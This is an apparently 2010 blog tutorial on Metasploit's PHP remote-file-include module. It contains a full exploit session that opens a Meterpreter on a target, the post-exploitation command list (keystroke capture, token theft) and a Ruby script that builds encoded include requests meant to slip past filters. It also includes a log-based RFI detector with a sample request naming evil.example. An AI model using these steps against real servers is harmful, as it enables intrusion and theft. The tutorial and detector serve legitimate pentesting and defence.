Crime on the wire
Update your Metasploit if you haven't already. Metasploit is expanding its horizons and now gives you a console for managing compromised web servers: specifically, it can exploit remote file inclusion (RFI) vulnerabilities in PHP applications and deliver a PHP Meterpreter through them.
Original source: http://blog.metasploit.com/2010/06/meterpreter-for-pwned-home-pages.html.
There is not much to write about here; it works roughly like this. The module starts its own HTTP server (SRVHOST/SRVPORT) that serves the PHP payload, then requests the vulnerable page with the include parameter (the XXpathXX placeholder in PHPURI) replaced by the URL of that server. The target's PHP fetches and executes the payload, which connects back to the handler. This only works when the target's PHP is allowed to include remote URLs (allow_url_include=On on PHP 5.2 and later, allow_url_fopen=On on older versions); with those off, the include fails and you get nothing.
msf > search php_include
[*] Searching loaded modules for pattern 'php_include'...
Exploits
========

   Name                     Rank       Description
   ----                     ----       -----------
   unix/webapp/php_include  excellent  PHP Remote File Include Generic Exploit
msf > use unix/webapp/php_include
msf exploit(php_include) > info
Name: PHP Remote File Include Generic Exploit
Version: 9392
Platform: PHP
Privileged: No
License: Metasploit Framework License (BSD)
Rank: Excellent
Provided by:
hdm
egypt
Available targets:
Id Name
-- ----
0 Automatic
Basic options:

  Name        Current Setting                                      Required  Description
  ----        ---------------                                      --------  -----------
  PATH        /                                                    yes       The base directory to prepend to the URL to try
  PHPRFIDB    /home/Ams/msf33/data/exploits/php/rfi-locations.dat  no        A local file containing a list of URLs to try, with XXpathXX replacing the URL
  PHPURI                                                           no        The URI to request, with the include parameter changed to XXpathXX
  Proxies                                                          no        Use a proxy chain
  RHOST                                                            yes       The target address
  RPORT       80                                                   yes       The target port
  SRVHOST     0.0.0.0                                              yes       The local host to listen on.
  SRVPORT     8080                                                 yes       The local port to listen on.
  SSL         false                                                no        Negotiate SSL for incoming connections
  SSLVersion  SSL3                                                 no        Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
  URIPATH                                                          no        The URI to use for this exploit (default is random)
  VHOST                                                            no        HTTP server virtual host
Payload information:
Space: 262144
Description:
This module can be used to exploit any generic PHP file include
vulnerability, where the application includes code like the
following:
msf exploit(php_include) > set PHPURI /msf.php?path=XXpathXX
PHPURI => /msf.php?path=XXpathXX
msf exploit(php_include) > set RHOST 127.0.0.1
RHOST => 127.0.0.1
msf exploit(php_include) > set LHOST 192.168.0.2
LHOST => 192.168.0.2
msf exploit(php_include) > show payloads
Compatible Payloads
===================

   Name                       Rank    Description
   ----                       ----    -----------
   generic/shell_bind_tcp     normal  Generic Command Shell, Bind TCP Inline
   generic/shell_reverse_tcp  normal  Generic Command Shell, Reverse TCP Inline
   php/bind_perl              normal  PHP Command Shell, Bind TCP (via perl)
   php/bind_php               normal  PHP Command Shell, Bind TCP (via php)
   php/download_exec          normal  PHP Executable Download and Execute
   php/exec                   normal  PHP Execute Command
   php/meterpreter            normal  PHP Meterpreter
   php/reverse_perl           normal  PHP Command, Double reverse TCP connection (via perl)
   php/reverse_php            normal  PHP Command Shell, Reverse TCP (via php)
   php/shell_findsock         normal  PHP Command Shell, Find Port
msf exploit(php_include) > set PAYLOAD php/meterpreter
PAYLOAD => php/meterpreter
msf exploit(php_include) > set SRVPORT 8082
SRVPORT => 8082
msf exploit(php_include) > info
Name: PHP Remote File Include Generic Exploit
Version: 9392
Platform: PHP
Privileged: No
License: Metasploit Framework License (BSD)
Rank: Excellent
Provided by:
hdm
egypt
Available targets:
Id Name
-- ----
0 Automatic
Basic options:

  Name        Current Setting                                      Required  Description
  ----        ---------------                                      --------  -----------
  PATH        /                                                    yes       The base directory to prepend to the URL to try
  PHPRFIDB    /home/Ams/msf33/data/exploits/php/rfi-locations.dat  no        A local file containing a list of URLs to try, with XXpathXX replacing the URL
  PHPURI      /msf.php?path=XXpathXX                               no        The URI to request, with the include parameter changed to XXpathXX
  Proxies                                                          no        Use a proxy chain
  RHOST       127.0.0.1                                            yes       The target address
  RPORT       80                                                   yes       The target port
  SRVHOST     0.0.0.0                                              yes       The local host to listen on.
  SRVPORT     8082                                                 yes       The local port to listen on.
  SSL         false                                                no        Negotiate SSL for incoming connections
  SSLVersion  SSL3                                                 no        Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
  URIPATH                                                          no        The URI to use for this exploit (default is random)
  VHOST                                                            no        HTTP server virtual host
Payload information:
Space: 262144
Description:
This module can be used to exploit any generic PHP file include
vulnerability, where the application includes code like the
following:
msf exploit(php_include) > exploit
[*] Started reverse handler on 192.168.0.2:4444
[*] Using URL: http://0.0.0.0:8082/HKDlBDt
[*] Local IP: http://192.168.0.2:8082/HKDlBDt
[*] PHP include server started.
[*] Sending /msf.php?path=%68%74%74%70%3a%2f%2f%31%39%32%2e%31%36%38%2e%30%2e%32%3a%38%30%38%32%2f%48%4b%44%6c%42%44%74%3f
[*] Meterpreter session 1 opened (192.168.0.2:4444 -> 192.168.0.2:42087) at Tue Jun 15 03:45:04 +0300 2010
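What that "Sending" line actually contains, as an added Ruby example (my own illustration, not Metasploit's code): the XXpathXX placeholder in PHPURI is replaced by the include server's URL with a trailing "?", and every byte of it is percent-encoded, which is why the request shows no literal "http://". The second function shows what the vulnerable page ends up passing to include() once the web server has decoded the parameter, including the case where the application appends its own suffix. The PHPURI and server URL are the values from the session above; the ".php" suffix is an assumption about the target application, whose source the post does not show.

```ruby
require 'uri'

# Values taken from the session above.
PHPURI      = '/msf.php?path=XXpathXX'
INCLUDE_URL = 'http://192.168.0.2:8082/HKDlBDt'   # the "Local IP" URL of the include server

# Percent-encode every byte, as in the Sending line (%68%74%74%70 == "http").
# Encoding everything also defeats naive filters that look for the literal "http://".
def hex_encode(str)
  str.bytes.map { |b| format('%%%02x', b) }.join
end

# Build the request URI the module sends. The trailing '?' makes anything the
# application concatenates after the parameter (".php", "/header.inc", ...)
# land in the query string, where the include server simply ignores it.
def build_request_uri(template, include_url)
  template.sub('XXpathXX', hex_encode(include_url + '?'))
end

# What the vulnerable page sees after the web server decodes the parameter,
# and what PHP's include() would resolve if the application appends a suffix
# (the suffix is assumed; the post does not show the target's source).
def resolve_include(request_uri, param, app_suffix = '')
  query  = URI.parse(request_uri).query
  value  = URI.decode_www_form(query).to_h[param]   # server-side %XX decoding
  target = URI.parse(value + app_suffix)
  { decoded: value, host: target.host, port: target.port,
    path: target.path, query: target.query }
end

if __FILE__ == $PROGRAM_NAME
  uri = build_request_uri(PHPURI, INCLUDE_URL)
  puts "Sending #{uri}"
  p resolve_include(uri, 'path', '.php')
end
```

Run as-is it prints the same Sending line as the session and then shows that even with a ".php" suffix appended by the application, the fetched path is still /HKDlBDt on the include server; the suffix only becomes the query string. This is also why the target must have allow_url_include (or, on older PHP, allow_url_fopen) enabled: include() has to be willing to open an http:// stream at all.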
meterpreter > help
Core Commands
=============
Command Description
------- -----------
? Help menu
background Backgrounds the current session
bgkill Kills a background meterpreter script
bglist Lists running background scripts
bgrun Executes a meterpreter script as a background thread
channel Displays information about active channels
close Closes a channel
exit Terminate the meterpreter session
help Help menu
interact Interacts with a channel
irb Drop into irb scripting mode
migrate Migrate the server to another process
quit Terminate the meterpreter session
read Reads data from a channel
run Executes a meterpreter script
use Load a one or more meterpreter extensions
write Writes data to a channel
Stdapi: File system Commands
============================
Command Description
------- -----------
cat Read the contents of a file to the screen
cd Change directory
del Delete the specified file
download Download a file or directory
edit Edit a file
getlwd Print local working directory
getwd Print working directory
lcd Change local working directory
lpwd Print local working directory
ls List files
mkdir Make directory
pwd Print working directory
rm Delete the specified file
rmdir Remove directory
upload Upload a file or directory
Stdapi: Networking Commands
===========================
Command Description
------- -----------
ipconfig Display interfaces
portfwd Forward a local port to a remote service
route View and modify the routing table
Stdapi: System Commands
=======================
Command Description
------- -----------
clearev Clear the event log
drop_token Relinquishes any active impersonation token.
execute Execute a command
getpid Get the current process identifier
getprivs Get as many privileges as possible
getuid Get the user that the server is running as
kill Terminate a process
ps List running processes
reboot Reboots the remote computer
reg Modify and interact with the remote registry
rev2self Calls RevertToSelf() on the remote machine
shell Drop into a system command shell
shutdown Shuts down the remote computer
steal_token Attempts to steal an impersonation token from the target process
sysinfo Gets information about the remote system, such as OS
Stdapi: User interface Commands
===============================
Command Description
------- -----------
enumdesktops List all accessible desktops and window stations
getdesktop Get the current meterpreter desktop
idletime Returns the number of seconds the remote user has been idle
keyscan_dump Dump the keystroke buffer
keyscan_start Start capturing keystrokes
keyscan_stop Stop capturing keystrokes
screenshot Grab a screenshot of the interactive desktop
setdesktop Change the meterpreters current desktop
uictl Control some of the user interface components
meterpreter > sysinfo
Computer: pinguin
OS : Linux pinguin 2.6.29.6-smp #2 SMP Mon Aug 17 00:52:54 CDT 2009 i686
meterpreter > getuid
Server username: apache (80)
If PHPURI is not set, Metasploit walks the paths in its RFI database (PHPRFIDB, rfi-locations.dat, which was compiled by RSnake): each entry is a known-vulnerable URI with an XXpathXX placeholder, and the module requests every one of them under PATH until one of them fetches the payload.
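When the module sprays rfi-locations.dat instead of a fixed PHPURI, the target's access log fills with requests of the shape shown in the Sending line above, one per candidate path and most of them 404s. As an added example (my own code, not part of the post or of Metasploit), here is a small detector that decodes query parameters first and only then looks for values that PHP could include remotely. The log lines it runs over are constructed for the example; the first one reproduces the request from the session above.

```ruby
require 'uri'

# Constructed Apache combined-log lines (not from the original post). Line 1 is
# the request the module sent above, line 2 is benign, line 3 is a spray-style
# attempt against a path that does not exist, as happens with rfi-locations.dat.
SAMPLE_LOG = <<~LOG
  192.168.0.2 - - [15/Jun/2010:03:45:04 +0300] "GET /msf.php?path=%68%74%74%70%3a%2f%2f%31%39%32%2e%31%36%38%2e%30%2e%32%3a%38%30%38%32%2f%48%4b%44%6c%42%44%74%3f HTTP/1.1" 200 0 "-" "Mozilla/4.0"
  10.0.0.5 - - [15/Jun/2010:03:46:10 +0300] "GET /msf.php?path=index HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
  10.0.0.7 - - [15/Jun/2010:03:47:22 +0300] "GET /oldapp/index.php?page=ftp%3A%2F%2Fevil.example%2Fc.txt%3F HTTP/1.1" 404 0 "-" "curl/7.19"
LOG

# Streams PHP will include when allow_url_include is on: remote schemes plus the
# wrappers that turn request data into code (php://input, data:).
REMOTE_INCLUDE = %r{\A(?:https?|ftps?)://|\Aphp://input|\Adata:}i

# Returns one finding per query parameter whose *decoded* value points at a
# remote include. Decoding first is the point: the module's request contains
# no literal "http://", so grepping the raw log for it would miss the hit.
def rfi_findings(log_text)
  log_text.each_line.with_object([]) do |line, out|
    m = line.match(/\A(?<client>\S+) .*?"(?<method>[A-Z]+) (?<uri>\S+) HTTP/)
    next unless m
    begin
      query = URI.parse(m[:uri]).query
      next unless query
      params = URI.decode_www_form(query)
    rescue URI::InvalidURIError, ArgumentError
      next                                # malformed request line or %-encoding
    end
    params.each do |name, value|
      next unless value =~ REMOTE_INCLUDE
      out << { client: m[:client], uri: m[:uri].split('?').first,
               param: name, value: value, status: line[/" (\d{3}) /, 1] }
    end
  end
end

if __FILE__ == $PROGRAM_NAME
  rfi_findings(SAMPLE_LOG).each { |f| puts f.inspect }
end
```

Two findings come out: the real hit (status 200, the include server's URL ending in "?") and the spray attempt (404). Expect false positives on applications that legitimately take URLs in parameters (redirect targets, feed readers), so group by client and look at the ratio of 404s: a database walk shows up as one client hammering dozens of different paths with the same encoded URL in different parameter names.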
Two things to keep in mind. The help output above lists the full stdapi command set, but a PHP Meterpreter only implements what can be done from PHP: commands that need a native Windows agent (reg, clearev, steal_token, keyscan_*, screenshot, migrate) will not work here, and the session runs as the web server user (apache, see getuid), so it is limited to what that account and the PHP configuration allow. Still, once again Metasploit comes to the web, making life easier for pentesters (and not only them) :)
tags: Metasploit, PHP, RFI